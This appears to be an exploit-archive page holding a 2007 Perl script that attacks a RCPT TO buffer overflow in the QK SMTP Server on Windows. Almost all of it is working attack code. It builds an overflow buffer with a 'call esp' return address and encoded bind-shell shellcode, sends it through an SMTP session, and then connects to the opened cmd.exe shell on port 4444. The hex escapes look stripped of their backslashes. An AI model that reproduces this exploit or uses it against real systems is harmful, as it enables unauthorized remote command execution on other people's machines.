Home / os / win10

qksmtp.pl.txt

Posted on 02 January 2007

#!/bin/perl
#
#http://www.securityfocus.com/bid/20681
#
#	tested on winXp Pro SP0 English/winXp Pro SP2 Italian/win 2k SP4 Italian/English return address is universal
# bind a remote cmd.exe on target host on 4444 port; based on expanders original exploit
# credit to Greg Linares for discovered the vulnerability
# thanks to hdm and vlads902 for original shellcode;encoded using Skylined alpha2 tool
# Jacopo Cervini aka acaro [at] jervus.it


if (@ARGV < 1) {
print "--------------------------------------------------------------------
";
print "Usage : qksmtp-rcpt-overflow-4444.pl TargetIPAddress 
";
print " Example : ./qksmtp-rcpt-overflow-4444.pl 127.0.0.1 
";
print "--------------------------------------------------------------------
";
}



use IO::Socket::INET;

my $host = shift(@ARGV);
my $port = 25;
my $reply;
my $request;
#my $eip="x43x43x43x43";

my $eip="x8fx29x46x00";	#call esp in QKSmtpServer3.exe



$sc=
"PPYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAIAQAIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1AIQIAIQI111AIAJQYAZ".
"BABABABABkMAGB9u4JBYlQZjKNmiXkIyokOkOOptKplmTo4RkQ5oL2kCLm5PxkQJORkPOLX4KOoKpIqjKOYtKP4DKkQZNp1upryVLqtWP".
"44LGWQgZjmjaXBJKL4MkntktnHt5IURkqOnDkQzKqVRkLLNkRkQOMLM1xkm3NLTKQyBLO4mLoqy3lqIK34rkmsLptKQ0LL4KppmL4mdKM".
"pKXOnaX4N0NLNjLNpKOz6ovOcRFOxlsOBphSGRSoBaOOdkOXPRH8KjMKLOKpPkO6vQOTIXeOve1JMm8JbnuqZKRkOHPbH7izizUvMPWYo".
"6vnsOcQCb3PSMsNsOSNskOfp1VqXLQ1LrFnsu99QTUQXTdMJ2PewqGkOVvqZZpnqPUkOXPph3tTmNNZINwKO6vns0UKO6pOxIUoYBfa9r".
"7Yo6vb00TOdR5YoHP3cRHgwRYGVbYnwkOJ6OeyoJ0s60j1T36OxqSrMU9jEozPPPYNIxLQyzGrJmtriYRnQGPZSdjkNORlmynMrnL63Bm".
"PznXvKFKVKqXPrKNvSMFyoD5Mtyo6vqKPWPRPQoaNqbJkQpQpQoepQKOfpOxtmz9m58NNsiovv2JYoyoLw9oVpDK27ilqsvds4KOWfpRk".
"OvpOxhp1zitOonsKOyFKO6pA";


$jmpback = "x50x73".
"x54x73".
"x58x73".
"xb0".
"x48x73".
"xb0x48x73".
"xb0x48x73".
"xb0x48x73".
"xb0x48x73".
"xb0x48x73".
"xb0x48x73".
"xb0x48x73".
"xb0x48x73".
"xb0x48x73".
"xb0x48x73".
"xb0x48x73".
"xb0x48x73".
"x40x73".
"x40x73".
"x40x73".
"x40x73".
"x40x73".
"x40x73".
"x40x73".
"x50x73".
"xc3x73";

my $buffer =("x41"x296).$eip.("x73"x2228).$sc.("x45"x820).$jmpback."x00";



my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$host, PeerPort=>$port);
$socket or die "Cannot connect to host!
";

recv($socket, $reply, 1024, 0);
print "Response:" . $reply;


$request = "helo acaro" . "
";
send $socket, $request, 0;
print "[+] Sent helo request
";
recv($socket, $reply, 1024, 0);
print "Response:" . $reply;
sleep(1);

$request = "mail from: acaro@peaceandlove.peace" . "
";
send $socket, $request, 0;
print "[+] Sent mail from request
";
recv($socket, $reply, 1024, 0);
print "Response:" . $reply;
sleep(1);

$request = "rcpt to: " . $buffer . "
";
send $socket, $request, 0;
print "[+] Sent rcpt to request
";



print " + connect on 4444 port of $host ...
";
sleep(3);
system("telnet $host 4444");
exit;

 

TOP

Malware :

Exploits :